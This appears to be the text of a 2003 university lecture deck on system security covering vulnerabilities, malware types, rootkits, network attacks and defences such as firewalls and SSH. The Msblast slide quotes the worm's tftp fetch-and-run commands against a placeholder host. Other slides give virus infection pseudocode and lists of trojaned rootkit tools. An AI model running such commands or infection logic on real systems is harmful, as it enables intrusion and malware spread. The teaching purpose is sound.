System Security
Prabhaker Mateti
Wright State University
A Few Assessments …
Top 20 Vulnerabilities/ NIPC+FBI+SANS
(May 29, 2003)
W1 Internet Information Services (IIS)
W2 MDAC Remote Data Services
W3 Microsoft SQL Server
W4 NETBIOS -- Unprotected Networking Shares
W5 Anonymous Logon -- Null Sessions
W6 LAN Manager Authentication -- Weak LM Hashing
W7 No Passwords or Weak Passwords
W8 Internet Explorer
W9 Remote Registry Access
WA Windows Scripting Host
SysSec/SIAC2003
Mateti/WrightStateU
3
Top 20 Vulnerabilities/ NIPC+FBI+SANS
(May 29, 2003)
U1 RPC Remote Procedure Calls
U2 Apache Web Server
U3 Secure Shell (SSH)
U4 SNMP
U5 File Transfer Protocol (FTP)
U6 R-Services -- Trust Relationships
U7 Line Printer Daemon (LPD)
U8 Sendmail
U9 BIND/DNS
UA No Passwords or Weak Passwords
Threats To The National Infrastructures
(Defense Science Board)
1. Incomplete, inquisitive and unintentional blunders.
2. Hackers driven by technical challenges.
3. Disgruntled employees or customers seeking revenge.
4. Criminals interested in personal financial gain or stealing services.
5. Organized crime with the intent of hiding something or financial gain.
6. Organized terrorist groups attempting to influence U.S. policy by isolated attacks.
7. Foreign espionage agents seeking to exploit information for economic, political, or military purposes.
8. Tactical countermeasures intended to disrupt specific weapons or command structures.
9. Multifaceted tactical information warfare applied in a broad orchestrated manner to disrupt a major U.S. military mission.
10. Large organized groups or nation-states intent on overthrowing the United States.
Just the facts Madam
Security Incidents / CERT
76,404 Jan –June 2003
82,094 all of 2002
“CERT uses the word "incident" as an
administrative term that groups together any
related set of activities; for example, activities in
which the same tool or exploit is used by an
intruder. A single "incident" can involve anything
from a single host computer to a very large
number of host computers, at a single site or at
hundreds of thousands of sites.”
Number of Hosts in the DNS
(isc.org Internet Domain Survey, Jan 2003)
Jan 2003   171,638,297
Jul 2002   162,128,493
Jan 2002   147,344,723
Jul 2001   125,888,197
Jan 2001   109,574,429
Jul 2000    93,047,785
Jan 2000    72,398,092
Terms …
“So you got r00ted.”
Your machine has been compromised.
root = administrator = super-user
An unauthorized user has obtained root
privileges.
A rootkit may have been installed.
Forensic analyses made with tools
existing on that system are unreliable.
Denial of Service (DoS)
We think of computer systems as
providing services to authorized users.
When a system is deliberately made to
crash, or made to run legitimate users'
programs so very slowly that it is
unusable, we refer to it as a "denial of
service attack."
The attacker accomplishes this by
running specially crafted programs,
knowing in advance what the
consequences will be.
Black Hats v. White Hats
Black hats are the "bad" guys: they
use their knowledge to break into
systems without authorization, and
pass that knowledge on to others
like them.
White hats are the "good" guys:
they are mostly into forensics and
prevention of attacks.
Vulnerability, …
Vulnerability: A weakness that can
be exploited to cause damage.
Attack: A method of exploiting a
vulnerability.
Threat: A motivated, capable
adversary that mounts attacks.
Hacker v. Attacker v. Intruder
Hacker = One who programs
enthusiastically, even obsessively.
An expert at a particular program, as in
‘a Unix hacker’.
A hacker enjoys exploring the details of
programmable systems and how to
stretch their capabilities.
A hacker has ethics.
Viruses
Viruses are "programs" that modify
other programs on a computer,
inserting copies of themselves.
Viruses are not officially programs:
– They cannot run on their own.
– Need to have some host program.
– When the host program is run, the virus
runs.
Structure of Viruses
V() {
    infectExecutable();
    if (triggered()) doDamage();
    jump to main of infected program;
}
void infectExecutable() {
    file = choose an uninfected executable file;
    prepend V to file;
}
void doDamage() { ... }
int triggered() { return (some test ? 1 : 0); }
Worms
Worms are programs that propagate
from computer to computer on a
network.
Worms can run independently.
Worms may have (different) portions of
themselves running on many different
machines.
Worms do not change other programs,
although they may carry other code
that does.
Trojans
A Trojan mimics the functionality
of its namesake legitimate
program.
But has a hidden “agenda.”
Ex: wu-ftpd Trojan - Login with
specific user/password gives a
root shell.
Backdoors
Also called trap doors.
Allow unauthorized access to a
system.
The absence of backdoors cannot
be established.
Malware
Viruses + Worms + Trojans + …
Any “program” that has a
“malicious” intent …
System Security
“System Security” =
Computer Security + Network Security + Internet Security
Trojan Horses, Viruses and Worms
Privacy and Authentication
TCP/IP exploits
Firewalls
Secure Configuration of Personal Machines
Buffer Overflow and Other Bug Exploitation
Writing Bug-free and Secure Software
Secure e-Commerce Transactions
…
Current practices, and their
problems
Improper Configuration
Out of the box installations are
rarely properly configured.
Standard user accounts with
standard passwords.
Running unneeded services.
Leaving sensitive files readable or writable by everyone.
Fortification
Start with a properly configured
system.
Delete weak or unneeded
components.
Add protective layers.
Keep detailed logs.
Hardened OS
Often “equated” with fortification.
Rebuilding an OS from the same
source code but by using a more
rigorous compiler.
Redesigning portions of an OS.
Statically v. dynamically
configured.
Rootkits
“A rootkit is a collection of tools and utilities that
attackers use to hide their presence and gather data to
help them infiltrate further across the network. Rootkits
insert backdoors, install Trojans, and patch existing
programs.”
A rootkit may disable auditing when a certain user is logged on.
A rootkit could allow anyone to log in if a certain backdoor password is used.
A rootkit could patch the kernel itself, allowing anyone to run privileged code if they use a special filename.
Installed after the attacker gains access.
Not detectable by firewalls, and often not by anti-virus scanners either: a rootkit that has patched the kernel or the system's APIs controls what the scanner gets to see.
203 results for search “rootkit” on www.packetstormsecurity.org
Rootkits
“Rootkit” was originally a Unix
term, derived from the word
“root”.
Unix rootkits typically replace
system binaries with trojaned
binaries.
The trojaned binaries hide the
attacker activities
Windows Rootkit
A Windows rootkit typically replaces
APIs, not binaries.
Any program that calls those replaced
APIs is potentially affected.
The rootkit typically hides itself using
the hacked Windows installation.
A typical Windows rootkit can hide files,
folders, processes, services, and
registry entries
Windows Rootkit Examples
null.sys
HE4Hook
Hacker Defender
Slanret
Vanquish
Fu
…
Null session
Unauthenticated connection
Empty username, empty password
“Null sessions can *always* be established to NT4, Windows
2000, and Windows XP machines. If the machine's server
service is enabled, and ports 139 or 445 are available, then
you can do a net use with anonymous credentials, and the
system will respond with "Command completed successfully".
This has not changed from NT4 to Win2K to XP.” -- [email protected]
Linux Rootkit Examples
Linux Rootkit (LRK)
TeLeKit
Adore
Knark
t0rnkit
Kernel Intrusion System (KIS)
…
[ASCII-art banner of a Linux rootkit distribution, garbled in extraction]
Components and what the trojaned versions do:
chfn        Trojaned! User->r00t
chsh        Trojaned! User->r00t
inetd       Trojaned! Remote access
login       Trojaned! Remote access
ls          Trojaned! Hide files
du          Trojaned! Hide files
ifconfig    Trojaned! Hide sniffing
netstat     Trojaned! Hide connections
passwd      Trojaned! User->r00t
ps          Trojaned! Hide processes
top         Trojaned! Hide processes
rshd        Trojaned! Remote access
syslogd     Trojaned! Hide logs
linsniffer  Packet sniffer!
fix         File fixer!
z2          Zap2 utmp/wtmp/lastlog eraser!
wted        wtmp/utmp editor!
lled        lastlog editor!
bindshell   port/shell type daemon!
tcpd        Trojaned! Hide connections, avoid denies
Msblast.exe
(Aug 12, 2003)
The exploit code is derived from the well known dcom.c exploit.
Exploits the MS DCOM RPC vulnerability using TCP port 135.
Produces a remote command line shell.
Runs the following commands:
    tftp -i x.x.x.x GET msblast.exe
    start msblast.exe
    msblast.exe
Creates the following registry key to run at boot:
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\windows auto update = 'msblast.exe'
The worm will begin to scan the local class B subnet, and will also
generate a random address to begin scanning at, then will
sequentially scan from that point forward incrementing by host
address, class c, class b and class a. It can scan hosts at a rate of 20
per second.
The worm contains the following text, which does not get displayed:
“I just want to say LOVE YOU SAN!! billy gates why do you make this possible ?
Stop making money and fix your software!!”
Booting Up
BIOS
OS Kernel
Initialization
User logins
boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(9)\WINDOWS
[operating systems]
C:\bootsect\hdc3grub.bin="Booting From FAT32on120GB"
multi(0)disk(0)rdisk(0)partition(3)\WINDOWS="Windows XP Pr
multi(0)disk(0)rdisk(0)partition(9)\WINDOWS="Windows XP Pr
multi(0)disk(0)rdisk(0)partition(14)\WINDOWS="Windows XP P
C:\bootsect\hdc3grub.bin="Linux via Grub"
/boot/grub/menu.lst
timeout 10
default 1
title failsafe
    kernel (hd0,6)/boot/vmlinuz root=/dev/hda7 failsafe devfs=nomount hdc=ide-scsi acpi=off
    initrd (hd0,6)/boot/initrd.img
title linux-smp
    kernel (hd0,6)/boot/vmlinuz-smp root=/dev/hda7 devfs=mount hdc=ide-scsi acpi=off
    initrd (hd0,6)/boot/initrd-smp.img
title windows
    root (hd0,0)
    chainloader +1
Human User Authentication
Something you know (e.g., a password or other secret);
Something you have (e.g., smart card, credit card);
Something you are (e.g., fingerprints, retinal scan, voice print).
Passwords
Weak passwords; social
engineering.
telnet, ftp, … passwords travel the
network in the clear; can be
sniffed.
One Time Passwords
Cryptography
"Computationally Infeasible”
N = 2^a * 3^b * 5^c * 7^d * ...
One way hash function
– takes a variable-length input
sequence of bytes and converts it into
a fixed-length sequence.
– designed to be computationally
infeasible to reverse the process
Symmetric Keys
sender and receiver of a message
share a single, common key.
If ct = encryption (pt, key), then
pt = decryption (ct, key).
DES
IDEA
Blowfish
Public and Private Keys
a public key known to everyone, and a
private or secret key known only to the
recipient of the message
The two keys are mathematically
related, yet it is computationally
infeasible to deduce one from the other.
A global registry of public keys is
needed
RSA
Man-in-the-Middle Attack
The public key-based communication between say Alice and Bob is
vulnerable.
Let us assume that Mallory, a cracker, not only can listen to the traffic
between Alice and Bob, but also can modify, delete, and substitute
Alice's and Bob's messages, as well as introduce new ones. Mallory
can impersonate Alice when talking to Bob and impersonate Bob when
talking to Alice. Here is how the attack works.
Bob sends Alice his public key. Mallory intercepts the key and sends
his own public key to Alice.
Alice generates a random session key, encrypts it with "Bob’s" public
key (which is really Mallory's), and sends it to Bob.
Mallory intercepts the message. He decrypts the session key with his
private key, encrypts it with Bob's public key, and sends it to Bob.
Bob receives the message thinking it came from Alice. He decrypts it
with his private key and obtains the session key.
Alice and Bob start exchanging messages using the session key.
Mallory, who also has that key, can now decipher the entire
conversation.
Buffer Overflow
“Quick: What's the computer vulnerability of the decade? It's not the
Y2K bug, according to computer science and security analysts, but a
security weakness known as the buffer overflow .”
Executable code is injected on to the runtime
stack.
The return address that was on the stack is
modified to point to the beginning of this
code.
The executable code chosen produces a shell.
If the exploited program runs with root privileges, the
shell is a root shell: you are r00ted.
Buffer Overflow
Many of the Top 20 vulnerabilities
are buffer overflow problems.
Caused by a simple class of programming errors:
unchecked copies into fixed-size buffers.
C and its promiscuous style (no bounds checking on
arrays or strings) make them easy to write.
Network Security
Ethernet is a broadcast medium.
Packet switching.
Security of the Connection
Least secure: Wireless networking
Second least secure: Always-on
wired connections
Second most secure: Intermittent
wired connections (dial-up)
Most secure: Never connected.
TCP/IP Design Problems
Designed with too little concern for
security.
All data, including various fields in
the protocol headers, are sent in
the clear.
Sender and Receiver in the packet
can be spoofed.
IP4 Spoofing
IP address: a.b.c.d, 4-bytes.
IP packet contains the IP addresses of
sender and receiver.
Everything in the clear.
IP spoofing replaces the IP address of
(usually) the sender or (in rare cases)
the destination with a different address.
Services that authenticate based on the
IP addresses are vulnerable.
RPC, NFS, r-commands (rlogin, rsh, rcp, etc.), X
windows, …
IP Fragment Attacks
When a datagram is larger than a link can carry in one frame
(the MTU of an interface, for example), an intermediate
router can split it into fragments.
The final destination reassembles all the fragments of
an IP packet.
Attackers create artificially fragmented packets in order
to circumvent firewalls that inspect fragments one at a
time and do not perform reassembly.
The IP-layer reassembly code of nearly every OS has had bugs.
Attackers craft fragments (overlapping, oversized, or
incomplete) that trigger these bugs.
IPsec
Data Confidentiality: IPSec sender can encrypt packets
before transmitting them across a network.
Data Integrity: IPSec receiver can authenticate packets
sent by the IPSec sender to ensure that the data has
not been altered during transmission.
Data Origin Authentication: IPSec receiver can
authenticate the source of the IPSec packets sent. This
service is dependent upon the data integrity service.
Anti-Replay: IPSec receiver can detect and reject
replayed packets.
Two encryption modes: Transport and Tunnel.
IP6
Expanded Addressing Capabilities
Header Format Simplification
Improved Support for Extensions
and Options
Flow Labeling Capability
Authentication and Privacy
Capabilities
TCP Exploits
The SYN Flood
Connection Killing by RST
Closing a Connection by FIN
Connection Hijacking
Covert Channels
Sending of “data” not in the
payload, but via other “places.”
Headers.
Sequence numbers.
Probing
Port Scanning is one of the most
popular among the reconnaissance
techniques.
Find open ports
Fingerprint the OS
Stealth scan, Bounce scan, …
nmap
Sniffers
A packet sniffer is a program that
eavesdrops on the network traffic.
It copies packets as they pass the NIC.
An NIC in the normal mode reads
packets destined to its specific MAC
address, and all other packets are
ignored.
An NIC in promiscuous mode, receives
all packets regardless of the MAC
address.
Well known Trojan Ports (sample)
Port    Proto    Trojan
22      TCP      Shaft
23      TCP      Fire Hacker
41      TCP      Deep Throat
456     TCP      Hacker's Paradise
901     TCP      Backdoor.Devil
999     TCP      DeepThroat
6712    TCP      Sub Seven
8879    TCP/UDP  BackOrifice 2000
27444   UDP      Trin00/TFN2K
40412   TCP      The Spy
65535   TCP      Adore Worm/Linux
Distributed Denial of Service (DDoS)
Several machines participate in a
DoS attack of a victim.
These participants are often
compromised innocent machines
serving the “attacks.”
A remote client triggers the attack
servers.
DNS Attacks
Domain Name Service protocol is
inherently vulnerable.
DNS cache poisoning.
BIND 8 is the most popular DNS server.
Many DNS servers running BIND are not kept
up to date with security patches and software
updates.
On October 21, 2002, 9 of the 13 root
name servers were the target of a
DDoS attack.
Protecting Our Systems
Security Software
Secure Shell, PGP, …
Firewall Kits
Tools
– Top 50 Security Tools survey from www.nmap.org
– http://www.packetfactory.net
– nmap, SAINT, …
– tcpdump, ethereal, snort, …
– Password cracking
– Tcpwrapper
SSH (Secure Shell)
telnet, rlogin, … do not authenticate the
remote machine; SSH does.
The password that the user types as
part of the login ritual is sent as clear
text by telnet and rlogin; SSH sends it
encrypted.
The data sent and received during the rest
of the session is also clear text under telnet
and rlogin; SSH sends and receives it in
encrypted form.
SSH (Secure Shell)
ssh1 v. ssh2 (the SSH-1 protocol has known
weaknesses; prefer SSH-2).
SSH exploits do exist.
Susceptible to a man-in-the-middle attack on
first contact, if the server's host key is
accepted without being verified.
Encryption and decryption consume
computing and elapsed time.
Can be a nuisance. If the remote
system has been legitimately reinstalled
...
SSH client and servers
ssh
putty
ttermpro
openssh
VPN (Virtual Private Network)
Data travels over public networks,
usually the Internet.
The information needed to allow the
data packets to be routed between the
source node and the destination node is
available to the public medium as in
ordinary TCP/IP traffic,
But, all other information is encrypted.
PPTP, L2TP, IPsec
File Integrity
“Is the file what I installed? Did it
change?”
Time stamps, file size, … are not
reliable.
MD5 checksums.
The MD5 algorithm takes as input an arbitrary
length byte sequence and produces a 16-byte
"fingerprint" or "message digest" of the input. It
is conjectured that it is computationally infeasible
to produce two messages having the same
message digest, or to produce any message
having a given pre-specified target message
digest.
Scanning for “Viruses”
Scanners hook the read/write paths of the file
system, so files are checked as they are accessed.
Search for patterns in the file
content.
Search for specific file names, …
Can yield false positives.
Can miss identifying malware.
Packet Filters
Drop packets based on matching
certain parts: IP addresses, port
numbers, protocols, flags.
Network Address Translation - NAT
IP port forwarding
iptables -A FORWARD -d ! 192.168.17.0/24 -i eth1 -j prvt-extrn
iptables -A FORWARD -s 130.108.17.0/24 -i eth2 -j dmz-extrn
iptables -A FORWARD -d 130.108.17.0/24 -i eth0 -j extrn-dmz
iptables -A FORWARD -j DROP -l
Firewalls
Packet filters
Bastion Host
Proxy services
Stateful Inspection
Three Myths of Firewalls
Firewalls make the assumption that the only way in or
out of a corporate network is through the firewalls; that
there are no "back doors" to your network.
Firewalls make the assumption that all of the bad guys
are on the outside of the firewall, and everyone on the
inside of it can be considered trustworthy.
With macros, JavaScript, Java, … executable fragments
can be embedded inside data.
Windows XP Built-in “Firewall”
Intrusion Detection
Detect probes.
Constantly check file integrity.
Constantly check which ports are
open and why.
Keep detailed logs of suspicious
activity on a separate system.
Amazon.com book search results
(2003/08/26)
Network security       813
Internet security     1009
Computer security     2871
System security       1521
Homeland security       80
Security             32000
Web Sites
“There is an oceanic amount of
material on network security
available over the Internet.”
-- A Web Page.
How do we define a “Security Web
Site”?
1000+ web sites
A Few Chosen Security Websites
www.incidents.org
www.cert.org
www.cerias.purdue.edu
www.securityfocus.com
lwn.net/security
www.microsoft.com/security
www.phrack.org
Mateti/Internet Security Links
CEG 429 Home Page: www.cs.wright.edu/~pmateti/Courses/429
OSIS Lab Home Page: www.cs.wright.edu/~pmateti/OSIS
Support Web Site: www.cs.wright.edu/~pmateti/InternetSecurity/